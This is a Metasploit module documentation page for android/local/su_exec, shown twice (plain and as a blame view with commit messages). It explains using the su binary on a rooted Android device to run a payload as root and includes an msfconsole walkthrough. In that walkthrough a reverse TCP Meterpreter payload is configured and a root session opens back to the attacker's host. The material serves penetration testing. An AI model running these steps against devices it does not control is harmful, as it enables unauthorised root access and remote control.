documentation/modules/exploit/android/local/su_exec.md

## Vulnerable Application

This module uses the su binary present on rooted devices to run a payload as root.

A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root.
This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a
temporary directory, make it executable, execute it in the background, and finally delete the executable.

On most devices the su binary will pop-up a prompt on the device asking the user for permission.

This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
Many devices can be rooted by flashing new firmware, however the existing data will be lost.

## Scenarios

You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)

Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler. 
An example session follows:

```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                        Information         Connection
  --  ----  ----                        -----------         ----------
  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)

msf5 exploit(multi/handler) > use exploit/android/local/su_exec
msf5 exploit(android/local/su_exec) > set SESSION 1
SESSION => 1
msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
payload => linux/aarch64/meterpreter/reverse_tcp
msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176
LHOST => 192.168.0.176
msf5 exploit(android/local/su_exec) > set LPORT 4445
LPORT => 4445
msf5 exploit(android/local/su_exec) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.176:4445
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (818780 bytes) to 192.168.0.107
[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.

```

Please not that in most cases you will have to manually confirm the Superuser prompt 
on the device itself before the module completes. You can do `set WfsDelay 10` to
give yourself more time.
module doc standardizations 2020-01-20 21:41:32 -05:00			`## Vulnerable Application`
add documentation with the current status 2018-10-01 17:50:33 +08:00
			`This module uses the su binary present on rooted devices to run a payload as root.`

			`A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root.`
			`This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a`
			`temporary directory, make it executable, execute it in the background, and finally delete the executable.`

			`On most devices the su binary will pop-up a prompt on the device asking the user for permission.`

			`This module will only work on rooted devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.`
			`Many devices can be rooted by flashing new firmware, however the existing data will be lost.`

module doc standardizations 2020-01-20 21:41:32 -05:00			`## Scenarios`
add documentation with the current status 2018-10-01 17:50:33 +08:00
			`You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)`

			Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler.
			`An example session follows:`

			```
			`msf5 exploit(multi/handler) > sessions`

			`Active sessions`
			`===============`

			`Id Name Type Information Connection`
			`-- ---- ---- ----------- ----------`
			`1 meterpreter dalvik/android u0_a80 @ localhost 192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)`

			`msf5 exploit(multi/handler) > use exploit/android/local/su_exec`
			`msf5 exploit(android/local/su_exec) > set SESSION 1`
			`SESSION => 1`
			`msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp`
			`payload => linux/aarch64/meterpreter/reverse_tcp`
			`msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176`
			`LHOST => 192.168.0.176`
			`msf5 exploit(android/local/su_exec) > set LPORT 4445`
			`LPORT => 4445`
			`msf5 exploit(android/local/su_exec) > run`

			`[!] SESSION may not be compatible with this module.`
			`[*] Started reverse TCP handler on 192.168.0.176:4445`
			`[*] Transmitting intermediate midstager...(256 bytes)`
			`[*] Sending stage (818780 bytes) to 192.168.0.107`
			`[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800`
			`[-] Exploit failed: Rex::TimeoutError Operation timed out.`
			`[*] Exploit completed, but no session was created.`

			```

			`Please not that in most cases you will have to manually confirm the Superuser prompt`
			on the device itself before the module completes. You can do `set WfsDelay 10` to
			`give yourself more time.`